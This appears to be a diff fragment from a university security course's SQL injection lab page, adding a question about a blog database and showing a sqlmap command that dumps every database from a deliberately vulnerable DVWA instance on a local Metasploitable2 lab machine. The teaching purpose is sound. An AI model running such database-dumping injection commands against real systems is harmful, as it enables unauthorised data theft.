security-assignments/security-assignments.github.io/_activities/activity_sqli.md

 We can dump *all* of these using the `--dump-all` flag. **Warning**: this command will take a long time.
 There are a lot of tables across these databases on the MySQL server on Metasploitable2.

+{% include lab_question.html question='One of these databases contains data for a blog.
+What was kevin's first post on the blog?' %}

 ```shell
 sqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="$COOKIE" --dump-all